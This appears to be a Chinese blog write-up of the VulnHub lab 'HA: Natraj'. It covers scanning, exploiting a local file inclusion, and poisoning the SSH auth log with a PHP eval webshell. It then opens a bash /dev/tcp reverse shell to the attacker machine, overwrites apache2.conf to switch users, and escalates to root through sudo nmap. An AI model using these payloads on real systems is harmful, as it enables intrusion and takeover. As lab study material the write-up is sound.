当前位置: 首页 > news >正文

HA: Natraj靶场渗透测试

news 来源:原创 2025/5/7 15:09:04

HA: Natraj

来自 <HA: Natraj ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.239

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.239

访问80端口开放的http服务

4,扫描网站存在哪些子目录

dirsearch -u http://192.168.23.239 -x 403,404

http://192.168.23.239/console/

尝试这个网页存不存在文件包含漏洞 http://192.168.23.239/console/file.php

5,ffuf爆破url参数(FUZZ为需要暴力破解的参数名的占位字符串)

ffuf -u 'http://192.168.23.239/console/file.php?FUZZ=../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0

成功得到了一个参数file,成功验证存在文件包含漏洞

http://192.168.23.239/console/file.php?file=../../../../etc/passwd

但是不是远程文件包含漏洞

6,能够通过文件包含访问到ssh用户登录日志

http://192.168.23.239/console/file.php?file=../../../../var/log/auth.log

尝试故意登录错误,看日志会不会记录错误登录信息

ssh natraj@192.168.23.239

果然更新了错误登录信息,那么我就可以在ssh登录的时候将用户名替换成一句话木马进行恶意登录,也就是将错误日志写入了木马字符串(此时只能算字符串而不是PHP代码),然后通过本地文件包含漏洞包含/var/log/auth.log,使这个文件包含的网页变成木马网页

<?php @eval($_POST['vul']);?>

http://192.168.23.239/console/file.php?file=/var/log/auth.log

因为这里一句话木马被当成PHP代码执行了,所以不会显示出来

密码vul,使用蚁剑连接成功

在蚁剑当中反弹shell来达到迁移shell的目的

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

与此同时kali需要打开终端接收shell

nc -lvvp 4444

由此成功getshell

7,然后看看操作系统和内核的版本

uname -a

lsb_release -a

发现了一个用户mahakal,尝试横向移动到其他用户

8,针对文件权限继续信息收集,查找可利用的点

find / -user root -perm -4000 -print 2>/dev/null    //查找suid

find / -perm -4000 2>dev/null | xargs ls -la     //查找suid并详细展示

find / -writable -type d 2>/dev/null          //查找当前权限可写的路径

find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null       //查找777文件

find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root     //查找写权限文件

查看一下这个文件的内容

cat /etc/apache2/apache2.conf

  1. User ${APACHE_RUN_USER}
    表示 Apache 启动后,其子进程将以 APACHE_RUN_USER 环境变量所指定的用户身份运行。
  2. Group ${APACHE_RUN_GROUP}
    表示 Apache 子进程运行时会加入的用户组。

所以修改这两个就能够使反弹shell的用户变成其他高权限的用户,例如mahakal。修改命令如下:

export APACHE_RUN_USER=mahakal

export APACHE_RUN_GROUP=mahakal

9,需要换一种修改方法,那就是先复制靶场的/etc/apache2/apache2.conf文件到攻击机,然后修改对应内容,然后再把修改之后的文件上传到靶场,然后覆盖原来的/etc/apache2/apache2.conf

vim apache2.conf

python -m http.server

cd /tmp

wget http://192.168.23.182:8000/apache2.conf

cp /tmp/apache2.conf /etc/apache2/apache2.conf

修改成功重启靶机再次尝试使用蚁剑执行命令反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

reboot

nc -lvvp 4444

横向移动成功

10,查看如何提权,先看sudo和suid提权

nmap允许使用sudo命令以root用户执行

成功提权成为root用户,而后获得flag

相关文章:

  • Java并发编程-锁(一)
  • 工业质检/缺陷检测领域最新顶会期刊论文收集整理 | AAAI 2025【持续更新中】
  • [python] str
  • 线性回归练习1
  • 隐私计算框架FATE二次开发心得整理(工业场景实践)
  • 图像处理软件imgPro—调参救星!
  • 『Linux_网络』 基于状态机的Connect断线重连
  • 哈希表的设计
  • 基于STM32、HAL库的NS2009 触摸屏控制器驱动程序设计
  • 第二节:Vben Admin 最新 v5.0 对接后端登录接口(上)
  • LintCode第484题-交换数组两个元素,第9题-Fizz Buzz 问题,第46题-主元素,第50题数组剔除元素后的乘积
  • GAN模型
  • 芝法酱躺平攻略(22)——rabbitmq安装和使用(二)
  • WiFi那些事儿(六)
  • 链表的面试题2反转单链表
  • 从0开始学习大模型--Day2--大模型的工作流程以及初始Agent
  • 码蹄集——直角坐标到极坐标的转换、射线、线段
  • 2018年ASOC SCI1区TOP,混合灰狼算法HBBOG,深度解析+性能实测
  • 机器视觉框架源码——解读3(常用的资源和样式)
  • 在c++中老是碰到string,这是什么意思?
  • 动物只有在被认为对人类有用时,它们的建筑才会被特别设计
  • 创新创业50人论坛开幕在即,双创青年为何选择来上海筑梦?
  • “80后”海南琼海市长傅晟,去向公布
  • 潘功胜:央行将创设科技创新债券风险分担工具
  • 有人悬赏十万寻找“全国仅剩1只”的斑鳖,发帖者回应并证实
  • 马上评|从一个细节看今年五一档电影